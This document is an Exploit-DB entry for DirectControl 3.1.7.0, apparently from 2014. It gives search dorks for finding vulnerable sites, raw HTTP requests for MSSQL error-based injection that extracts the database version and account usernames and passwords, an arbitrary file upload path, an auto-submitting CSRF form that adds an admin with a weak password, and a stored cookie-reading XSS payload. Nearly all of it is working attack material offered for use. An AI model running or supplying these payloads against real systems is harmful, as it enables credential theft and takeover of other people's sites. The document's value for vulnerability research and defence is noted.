DirectControlTM 3.1.7.0 - Multiple Vulnerabilities

EDB-ID:

30669

CVE:





Platform:

Windows

Date:

2014-01-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

DirectControlTM Version 3.1.7.0  - Multiple Vulnerabilties
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : www.directclarity.com
.:. Dork           : [1]intext:"DirectClarity, LLC All Rights Reserved."
                     [2]inurl:"/cm/password_retrieve.asp?redir_id=1"
####################################################################

################################
[1] Sql Injection
===================
type: Post String Mssql Injection


extrct version database:
-------------------------

POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
redir_id=1&uname=' and+1=cast(@@version as int)--
-&email_password=Email+My+Password
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352




redir_id=1&uname=|command|&email_password=Email+My+Password


extrct Username & password:
----------------------------

information:
tablename:portal_accounts
columns: username , password


POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)
as int)
-- -&email_password=Email+My+Password
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352


username:
redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)
as int)
-- -&email_password=Email+My+Password

password:
redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts)
as int)
-- -&email_password=Email+My+Password


[2] Arbitrary File Upload
==========================

http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images

your file:
http://site/cm/media/images


[3] CSRF [Add Admin]
=====================

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/cm/admin.asp">
<input type="hidden" name="fname" value="...."/>
<input type="hidden" name="lname" value="...."/>
<input type="hidden" name="uname" value="admin"/>
<input type="hidden" name="pword" value="123456"/>
<input type="hidden" name="telco" value="...."/>
<input type="hidden" name="email" value="...."/>
<input type="hidden" name="ustat" value="0"/>
<input type="hidden" name="SecGroupDropDown" value="1"/>
<input type="hidden" name="AddButton" value="ADD THIS USER"/>
<input type="hidden" name="pageView" value="User Administration"/>
<input type="hidden" name="pageAction" value="Add System User"/>
<input type="hidden" name="whatDo" value="AddUserAction"/>
</form>
</body>
</html>


[4] Cross Site Scripting
=========================

Go to:
http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS
Management

and add new channel
put in new channel:
<script>alert(document.cookie);</script>

and submit!

####################################################################